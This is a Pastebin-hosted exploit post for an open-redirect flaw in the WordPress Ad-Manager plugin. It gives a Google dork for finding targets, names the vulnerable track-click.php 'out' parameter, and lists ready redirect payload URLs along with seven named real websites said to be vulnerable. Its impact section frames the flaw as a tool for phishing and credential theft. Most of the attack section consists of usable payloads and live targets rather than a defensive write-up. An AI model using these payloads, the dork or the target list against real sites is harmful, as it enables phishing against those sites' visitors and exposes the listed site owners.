Advertisement
KingSkrupellos

WordPress 4.4.18 Ad-Manager Plugins 1.1.2 Open Redirection

May 22nd, 2019
122
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.58 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : WordPress 4.4.18 Ad-Manager Plugins 1.1.2 Open Redirection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 23/05/2019
  7. # Vendor Homepage : wordpress.org
  8. # Software Information Link : wordpress.org/plugins/ad-manager-wd/
  9. # Software Affected Versions : Plugin Version 1.0.3 - 1.0.13 - 1.1.2 - WP Version 4.4.18
  10. # Tested On : Windows and Linux
  11. # Category : WebApps
  12. # Exploit Risk : Medium
  13. # Google Dorks : inurl:/wp-content/plugins/ad-manager/
  14. # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
  15. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  16. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  17. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  18.  
  19. ####################################################################
  20.  
  21. # Impact :
  22. ***********
  23. WordPress Ad-Manager Plugins accepts a user-controlled input that specifies
  24. a link to an external site, and uses that link in a Redirect. This simplifies phishing
  25. attacks. An http parameter may contain a URL value and could cause the web
  26. application to redirect the request to the specified URL. By modifying the URL
  27. value to a malicious site, an attacker may successfully launch a phishing scam and
  28. steal user credentials. Because the server name in the modified link is identical to the
  29. original site, phishing attempts have a more trustworthy appearance. Open redirect is a
  30. failure in that process that makes it possible for attackers to steer users to malicious
  31. websites. This vulnerability is used in phishing attacks to get users to visit malicious
  32. sites without realizing it. Web users often encounter redirection when they visit the
  33. Web site of a company whose name has been changed or which has been acquired by
  34. another company. Visiting unreal web page user's computer becomes affected
  35. by malware the task of which is to deceive the valid actor and steal his personal data.
  36.  
  37. ####################################################################
  38.  
  39. # Vulnerable File :
  40. *****************
  41. /track-click.php
  42.  
  43. # Vulnerable Parameters :
  44. ***********************
  45. ?out=
  46.  
  47. # Open Redirection Exploit :
  48. **************************
  49. /wp-content/plugins/ad-manager/track-click.php?out=https://www.[REDIRECTADDRESS].gov
  50.  
  51. /wp-content/plugins/ad-manager-1.1.2/track-click.php?out=https://www.[REDIRECTADDRESS].gov
  52.  
  53. /wp-content/plugins/ad-manager-1.0.3/track-click.php?out=https://www.[REDIRECTADDRESS].gov
  54.  
  55. ####################################################################
  56.  
  57. # Example Vulnerable Sites :
  58. *************************
  59. [+] glutenerzekeny.hu/wp-content/plugins/ad-manager/track-click.php?out=https://cxsecurity.com
  60.  
  61. [+] revistalima.com.ar/wp-content/plugins/ad-manager/track-click.php?out=https://cxsecurity.com/
  62.  
  63. [+] laktozerzekeny.hu/wp-content/plugins/ad-manager/track-click.php?out=https://cxsecurity.com/
  64.  
  65. [+] julyjubilee.com/wp-content/plugins/ad-manager-1.1.2/track-click.php?out=https://cxsecurity.com/
  66.  
  67. [+] tbeswindonandwilts.co.uk/wp-content/plugins/ad-manager-1.1.2_spare/track-click.php?out=https://cxsecurity.com/
  68.  
  69. [+] thepacificedge.com/wp-content/plugins/ad-manager-1.0.3/track-click.php?out=https://cxsecurity.com
  70.  
  71. [+] expofotomiami.org/wp-content/plugins/ad-manager-1.1.2/track-click.php?out=https://cxsecurity.com
  72.  
  73. ####################################################################
  74.  
  75. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  76.  
  77. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement